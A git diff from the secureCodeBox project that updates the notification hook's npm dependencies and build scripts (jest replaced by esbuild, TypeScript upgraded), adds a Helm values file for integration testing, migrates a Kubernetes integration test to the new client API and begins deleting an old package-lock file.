"sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "dev": true, "requires": { - "tmp": "^0.2.0" + "b4a": "^1.6.4" } }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha1-3F5pjL0HkmW8c+A3doGk5Og/YW4=", - "dev": true - }, "to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", @@ -9010,194 +3272,52 @@ "is-number": "^7.0.0" } }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "ts-jest": { - "version": "29.0.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.0.5.tgz", - "integrity": "sha512-PL3UciSgIpQ7f6XjVOmbi96vmDHUqAyqDr8YxzopDqX3kfgYtX1cuNeBjP+L9sFXi6nzsGGA6R3fP3DDDJyrxA==", - "dev": true, - "requires": { - "bs-logger": "0.x", - "fast-json-stable-stringify": "2.x", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "4.x", - "make-error": "1.x", - "semver": "7.x", - "yargs-parser": "^21.0.1" - }, - "dependencies": { - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - } - } - }, - "tslib": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.0.tgz", - "integrity": "sha512-336iVw3rtn2BUK7ORdIAHTyxHGRIHVReokCR3XjbckJMK7ms8FysBfhLR8IXnAgy7T0PTPNBWKiH514FOW/WSg==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", "dev": true }, "typescript": { - "version": "4.3.5", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.3.5.tgz", - "integrity": "sha512-DqQgihaQ9cUrskJo9kIyW/+g0Vxsk8cDtZ52a3NGh0YNTfpUSArXSohyUGnvbPazEPLu398C0UxmKSOrPumUzA==", + "version": "5.8.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.3.tgz", + "integrity": "sha512-p1diW6TqL9L07nNxvRMM7hMMw4c5XOo/1ibL4aAIGmSAt9slTE1Xgw5KWuof2uTOvCg9BY7ZRi+GaF+7sfgPeQ==", "dev": true }, - "underscore": { - "version": "1.13.6", - "resolved": "https://registry.npmjs.org/underscore/-/underscore-1.13.6.tgz", - "integrity": "sha512-+A5Sja4HP1M08MaXya7p5LvjuM7K6q/2EaC0+iovj/wOcMsTzMvDFbasi/oSapiwOlt252IqsKqPjCl7huKS0A==" - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-to-istanbul": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.0.1.tgz", - "integrity": "sha512-74Y4LqY74kLE6IFyIjPtkSTWzUZmj8tdHT9Ii/26dvQ6K9Dl2NbEfj0XgU2sHCtKgt5VupqhlO/5aWuqS+IY1w==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } + "undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dev": true }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "dev": true }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", "dev": true, "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" - }, - "ws": { - "version": "8.12.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.12.0.tgz", - "integrity": "sha512-kU62emKIdKVeEIOIKVegvqpXMSTAMLJozpHZaJNDYqBjzlSYXQGviYwN1osDLJ9av68qHd4a2oSjd7yD4pacig==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", "dev": true }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "yargs": { - "version": "17.6.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.6.2.tgz", - "integrity": "sha512-1/9UrdHjDZc0eOU0HxOHoS78C69UD3JRMvzlJ7S79S2nTaWRA/whGCTV8o9e/N/1Va9YIV7Q4sOxD8VV4pCWOw==", + "ws": { + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true + "requires": {} } } } diff --git a/hooks/notification/hook/package.json b/hooks/notification/hook/package.json index 3bd59a1d95..cd76149803 100644 --- a/hooks/notification/hook/package.json +++ b/hooks/notification/hook/package.json @@ -4,8 +4,8 @@ "description": "secureCodeBox Hook for Notification", "main": "hook.js", "scripts": { - "build": "npx tsc hook.ts --sourceMap --esModuleInterop", - "test": "npm run build && npx ts-jest config:init && jest --verbose --ci --colors --coverage --passWithNoTests" + "lint": "tsc hook.ts --noEmit --skipLibCheck", + "build": "esbuild --platform=node --target=node22 --format=esm --outdir=./build/ --sourcemap **/*.ts *.ts" }, "repository": { "type": "git", @@ -23,23 +23,21 @@ }, "homepage": "https://github.com/secureCodeBox/secureCodeBox#readme", "devDependencies": { - "@types/jest": "^29.4.0", - "@types/lodash": "^4.14.171", + "@kubernetes/client-node": "^1.3.0", + "@types/jest": "^30.0.0", + "@types/lodash-es": "^4.17.12", "@types/mustache": "^4.1.2", - "@types/node": "^16.0.0", + "@types/node": "^22.16.2", "@types/nodemailer": "^6.4.4", - "jest": "^29.3.1", - "typescript": "^4.3.5", "@types/nunjucks": "^3.1.5", - "ts-jest": "^29.0.5" + "esbuild": "^0.25.6", + "typescript": "^5.8.3" }, "dependencies": { - "@kubernetes/client-node": "^0.18.1", "@types/js-yaml": "^4.0.2", - "axios": "^1.6.0", "js-yaml": "^4.1.0", - "lodash": "^4.17.21", - "nodemailer": "^6.9.9", + "lodash-es": "^4.17.21", + "nodemailer": "^6.10.1", "nunjucks": "^3.2.4" } } diff --git a/hooks/notification/integration-tests/notification-hook-helm-values.yaml b/hooks/notification/integration-tests/notification-hook-helm-values.yaml new file mode 100644 index 0000000000..32174743e9 --- /dev/null +++ b/hooks/notification/integration-tests/notification-hook-helm-values.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +notificationChannels: + - name: slack + type: slack + template: slack-messageCard + rules: [] + endPoint: SLACK_ENDPOINT + +env: + - name: SLACK_ENDPOINT + value: "http://http-webhook.demo-targets.svc.cluster.local/slack-notification" diff --git a/tests/integration/hooks/notification.test.js b/hooks/notification/integration-tests/notification.test.js similarity index 53% rename from tests/integration/hooks/notification.test.js rename to hooks/notification/integration-tests/notification.test.js index 26fdce0957..a3a40f7811 100644 --- a/tests/integration/hooks/notification.test.js +++ b/hooks/notification/integration-tests/notification.test.js @@ -2,42 +2,44 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../helpers"); -const k8s = require("@kubernetes/client-node"); - -jest.retryTimes(3); +import { scan, getKubernetesAPIs } from "../../../tests/integration"; test( "should trigger notification", async () => { - await scan("test-scan-notification-web-hook", "test-scan", [], 90); + await scan( + "test-scan-notification-web-hook", + "test-scan", + ["placeholder"], + 90, + ); const WEBHOOK = "http-webhook"; - const NAMESPACE = "integration-tests"; - - const kc = new k8s.KubeConfig(); - kc.loadFromDefault(); + const NAMESPACE = "demo-targets"; - const k8sApi = kc.makeApiClient(k8s.CoreV1Api); + const { k8sPodsApi } = getKubernetesAPIs(); function containsPod(item) { return item.metadata.name.includes(WEBHOOK); } let podName; - await k8sApi.listNamespacedPod(NAMESPACE, "true").then((res) => { - let podArray = res.body.items.filter(containsPod); - if (podArray.length === 0) { - throw new Error(`Did not find Pod for "${WEBHOOK}" Hook`); - } - - podName = podArray[0].metadata.name; - }); + await k8sPodsApi + .listNamespacedPod({ + namespace: NAMESPACE, + }) + .then((res) => { + let podArray = res.items.filter(containsPod); + if (podArray.length === 0) { + throw new Error(`Did not find Pod for "${WEBHOOK}" Hook`); + } + + podName = podArray[0].metadata.name; + }); const containerName = WEBHOOK; const params = { - k8sApi, podName, namespace: NAMESPACE, containerName, @@ -46,18 +48,18 @@ test( expect(result).toBe(true); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); async function isHookTriggered(params) { console.log("Fetch Container Logs..."); - let containerLog = await params.k8sApi.readNamespacedPodLog( - params.podName, - params.namespace, - params.containerName, - false - ); - return containerLog.body.includes("/slack-notification"); + const { k8sPodsApi } = getKubernetesAPIs(); + let containerLog = await k8sPodsApi.readNamespacedPodLog({ + name: params.podName, + namespace: params.namespace, + container: params.containerName, + }); + return containerLog.includes("/slack-notification"); } const sleep = (durationInMs) => @@ -67,7 +69,7 @@ async function delayedRepeat( fun, functionParamObject, intervalInMs, - maxRetries + maxRetries, ) { for (let i = 0; i < maxRetries; i++) { const condition = await fun(functionParamObject); diff --git a/hooks/package-lock.json b/hooks/package-lock.json deleted file mode 100644 index 44fd2439ca..0000000000 --- a/hooks/package-lock.json +++ /dev/null @@ -1,7767 +0,0 @@ -{ - "name": "@securecodebox/hooks", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/hooks", - "version": "1.0.0", - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - }, - "devDependencies": { - "@types/jest": "^29.5.14", - "jest": "^29.7.0", - "ts-jest": "^29.2.5" - } - }, - "../tests/integration": { - "name": "@securecodebox/integration-tests", - "version": "1.0.0", - "extraneous": true, - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.16.2" - }, - "devDependencies": { - "jest": "^27.0.3", - "prettier": "^2.2.1" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "dependencies": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "dependencies": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.10.tgz", - "integrity": "sha512-UPYc3SauzZ3JGgj87GgZ89JVdC5dj0AoetR5Bw6wj4niittNyFh6+eOGonYvJ1ao6B8lEa3Q3klS7ADZ53bc5g==", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/template": "^7.26.9", - "@babel/types": "^7.26.10" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/parser": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.10.tgz", - "integrity": "sha512-6aQR2zGE/QFi8JpDLjUZEPYOs7+mhKXm86VaKFiLP35JQwQb6bwUE+XbvkH0EptsYhbNBSUGaUBLKqxH1xSgsA==", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/types": "^7.26.10" - }, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-static-block": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", - "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-attributes": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.26.0.tgz", - "integrity": "sha512-e2dttdsJ1ZTpi3B9UYGLw41hifAubg19AtCu/2I/F1QNVclOBr1dYpTdmdyZ84Xiz43BS/tCUkMAZNLv12Pi+A==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - 